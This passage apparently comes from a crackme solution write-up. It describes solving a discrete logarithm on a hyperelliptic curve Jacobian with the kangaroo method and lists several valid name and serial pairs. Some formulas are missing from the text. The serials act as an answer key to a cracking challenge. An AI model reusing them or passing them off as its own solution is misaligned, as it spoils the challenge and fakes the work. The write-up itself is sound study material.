The exact order is 4518471260972087 (~2^52), which is 2 times smaller than our rough estimate of 2^53, so knowing the exact order decreases the running time of kangaroo by a factor of .

We can also bound the order using Hasse-Weil theorem. In our case, theorem states that order lies in the interval . The upper bound is 1.08 times larger than the exact order, so it’d be a very good estimate.

Kangaroo implemented with FLINT solves the DLP in under an hour, using one 2GHz core. The solution is 3414275298009790.

For hyperelliptic curves, group law is defined for their Jacobians. To “add points” use Mumford representation and Cantor’s algorithm. For solving DLP over HE curves, you can use general purpose algorithms like Pollard’s rho/lambda, Pohlig Hellman, or index calculus. Note that curves of high genus are insecure in the sense that index calculus runs in subexponential time for them (see here for a discussion). For bounding/computing order, use Hasse-Weil theorem, or Frobenius polynomial.

Sources available on github, as usual.

Few serials, to prove correctness :):

pa_kt 38531D6B8FDF2A884166423D58B125B2 - trololo C356A2AB43CA6ACCEF72CCEE0C3FD40A - crackmes.us 076C49CC3AFF9D25CE8B7CA783B72430

P.S.

Dcoder pointed out I should mention the Riemann-Roch theorem. Thanks to R-R it’s possible to construct the isomorphism between and (it ensures the existence of reduced divisors).

**References**

[1] Leonard S. Charlap, David P. Robbins, *An Elementary Introduction to Elliptic Curves *

[2] Pierrick Gaudry, Robert Harley, *Counting Points on Hyperelliptic Curves over Finite Fields*